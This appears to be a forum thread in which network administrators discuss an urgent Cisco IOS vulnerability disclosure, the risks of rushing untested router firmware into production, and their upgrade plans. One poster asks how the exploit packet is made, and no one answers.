Maybe, but in reality, what's happened here is a vendor has just come to you and said, "Hi there! Guess what, there's been a bug in our code since day one, an amazingly simple little thing that no one has noticed till now. You should trust us to find these things earlier, but we've violated that trust and proven that we're no good at catching bugs in IOS. The fix is to run this sparkly new IOS that no one has ever used before! Please, install this on all your routers and switches within the next 36 hours because there's gonna be an exploit out."
The first thing that any logical person who's dealt with a vendor in the past must think is, "Oh crap, new, untested version that I have to deploy to all of the routers across my enterprise within 36 hours. There's a good chance that this vendor who has proven they can't catch bugs is going to have another bug in the software, causing my network to crash".
In this case, it doesn't matter how many members of the IT staff you have or don't have. If they were able to keep their information closer to the vest for another week or two (which they were trying to do, but people who believe in immediate full disclosure decided to derail that), businesses would have been able to burn in the new code to make sure that all of their requirements are met and that there are no other bugs that regression testing would have found.
I am in CCNA training right now (Sem 3 done), and I can bring a router from nothing to fully operational using different protocols and routing methods in a short matter of time. I don't know how to make a specially crafted IPv4 packet. Anybody know how to do this? And does anybody know the code to the said packet? Or is this just a specially long packet? I'm curious.
I got nothin'.
You're right, I was talking out my ass.
;)
But I bet maybe you and I could do it, with enough time, a database of details and perl/expect.
There are only a certain number of possible combinations of Cisco router hardware. If we knew their current state of hardware and software revisions, it should be possible to custom build an ios prom or patch the existing os to bring it in line with production.
Well, that's the way I look at these things. Let the software hash out the details, just make sure you get all the bases covered and run the script through intensive QA before deployment.
I bet a Cisco CCIE could do it. They can do anything.
Thanks for being honest. :D I gotta admit, I was feeling a bit ratty last night when I posted too.
I've got an 8-hour day planned tomorrow (Sunday) to upgrade our network at work, and we're looking at that much time just to do the critical boxes (20-odd) with leeway for funnies, and in an order that lets us recover if it goes to shit somewhere. We'll be doing a little parallel stuff, but not much. In theory I could upload the IOSes to the flash cards tonight, log in tomorrow from home and run ./reload-all -- but I'd be a bit screwed if any one of them had a funny I didn't know about.
:)
Thing is, in theory the upgrades would go fine; in practice they won't - you'll hit SOME funny that you couldn't have predicted, and the consequences are just too serious to let it go. The longer you have to plan and enact the upgrade, the smoother it'll go, and the less hurt you'll cause your customers.
You're right though. Cisco CCIEs are one step from godhood. I fear them.
Dave